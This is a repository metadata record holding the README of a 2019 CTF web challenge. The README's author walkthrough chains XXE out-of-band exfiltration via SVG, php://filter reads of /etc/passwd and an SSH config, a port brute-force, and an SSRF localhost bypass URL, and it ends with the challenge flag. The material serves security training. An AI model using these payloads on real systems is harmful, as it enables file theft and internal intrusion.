{"id":18688787,"url":"https://github.com/noraj/sigsegv2.webserver_11","last_synced_at":"2025-11-08T04:30:29.774Z","repository":{"id":55307910,"uuid":"225728296","full_name":"noraj/SigSegV2.webserver_11","owner":"noraj","description":"A web challenge that was available during SigSegV2 CTF (2019)","archived":false,"fork":false,"pushed_at":"2021-01-05T17:28:39.000Z","size":390,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-12-28T01:26:28.004Z","etag":null,"topics":["bypass","challenge","ctf","php","rtfm","sigsegv2","ssrf","svg","web","xxe"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/noraj.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-12-03T22:18:41.000Z","updated_at":"2024-01-17T17:51:42.000Z","dependencies_parsed_at":"2022-08-14T20:22:11.803Z","dependency_job_id":null,"html_url":"https://github.com/noraj/SigSegV2.webserver_11","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FSigSegV2.webserver_11","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FSigSegV2.webserver_11/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FSigSegV2.webserver_11/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FSigSegV2.webserver_11/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/noraj","download_url":"https://codeload.github.com/noraj/SigSegV2.webserver_11/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239549138,"owners_count":19657534,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","challenge","ctf","php","rtfm","sigsegv2","ssrf","svg","web","xxe"],"created_at":"2024-11-07T10:38:22.067Z","updated_at":"2025-11-08T04:30:29.746Z","avatar_url":"https://github.com/noraj.png","language":"PHP","funding_links":[],"categories":[],"sub_categories":[],"readme":"# XXE OOB via SVG + SSRF network scan + SSRF localhost bypass\n\n## Version\n\nDate        | Author                  | Contact               | Version | Comment\n---         | ---                     | ---                   | ---     | ---\n03/11/2019  | noraj (Alexandre ZANNI) | noraj#0833 on discord | 1.0     | Document creation\n\nInformation displayed for CTF players:\n\n+ **Name of the challenge** / **Nom du challenge**: `Image Checker 2`\n+ **Category** / **Catégorie**: `Web`\n+ **Internet**: not needed\n+ **Difficulty** / **Difficulté**: Very difficult / très difficile\n\n### Description\n\n```\nnoraj is hiding something...\n\nFlag format: sigsegv{flag}\n\nauthor: [noraj](https://pwn.by/noraj/)\n```\n\n### Hints\n\n- Hint1: SVG\n- Hint2: XXE\n- Hint3: SSRF\n- Hint4: SSH (user) config\n\n## Integration\n\nThis challenge require a Docker Engine and Docker Compose.\n\nBuilds, (re)creates, starts, and attaches to containers for a service:\n\n```\n$ docker-compose up --build\n```\n\nAdd `-d` if you want to detach the container.\n\n## Solving\n\n### Author solution\n\nMore hardcore version of *Image Checker 1* so first steps are the same but this\ntime the flag is not easily hidden in `/etc/passwd` but on a remote service.\n\n1. The app ask for a SVG.\n2. Other file types seem to be refused.\n3. Let's pick a legit svg and sent it to see what happens. Alternatively just load `view.php` without parameter.\n4. The app seems to parse info from the file.\n5. Since SVG is a XML let's try a XXE attack.\n6. We can't see any errors, let's try a XXE OOB.\n7. Let's start a HTTP server to deliver payloads (`xxe.svg` \u0026 `xxe.xml`) and...\n8. ... let's start a FTP OOB extraction receiver ([xxeserv](https://github.com/staaldraad/xxeserv)):\n    ```\n    ./xxeserv -p 2121 -w -wd /home/noraj/dir/ -wp 8080\n    ```\n9. Send the payload: http://x.x.x.x:42421/view.php?svg=http://192.168.1.84:8080/xxe.svg. (see `xxe.svg` \u0026 `xxe.xml`)\n10. Read `/etc/passwd`, the home of the user `noraj` is `/home/noraj/`. Change the `data` paylaod in `xxe.xml` to:\n    ```\n    php://filter/convert.base64-encode/resource=/etc/passwd\n    ```\n11. Let's try to find juicy files like `.bash_hisotry`, `.profile`, etc. the only one which exists is `/home/noraj/.ssh/config`. Change the `data` paylaod in `xxe.xml` to:\n    ```\n    php://filter/convert.base64-encode/resource=/home/noraj/.ssh/config\n    ```\n12. The ssh config file is leaking the `hiddenservice` domaine name.\n13. Then bruteforce port to find the port where a service is available: http://hiddenservice:9999. (see bruteforce script `bf_ports.rb` with in depth explanation in comments)\n14. We have to request http://127.0.0.1:10000 but port and host are blocked, we have to bypass it.\n15. Do an SSRF bypass. Change the `data` paylaod in `xxe.xml` to:\n    ```\n    php://filter/convert.base64-encode/resource=http://hiddenservice:9999?url=http://127.0.0.1:10000\n    ```\n    with\n    ```\n    php://filter/convert.base64-encode/resource=http://hiddenservice:9999/?url=http://127.0.0.1:10000%23@google.com:80/\n    ```\n\nSee the fuzzer PoC I created to find this SSRF bypass: https://gitlab.com/snippets/1911694\n\n## Flag\n\n`sigsegv{so_y0u_ar3_r3a11y_s3eri0us_4bout_XXE_4nd_SSRF}`\n\n## SigSegV2\n\nA web challenge that was available during SigSegV2 CTF (2019).\n\n1 teams on 36 flaged this challenge.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnoraj%2Fsigsegv2.webserver_11","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnoraj%2Fsigsegv2.webserver_11","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnoraj%2Fsigsegv2.webserver_11/lists"}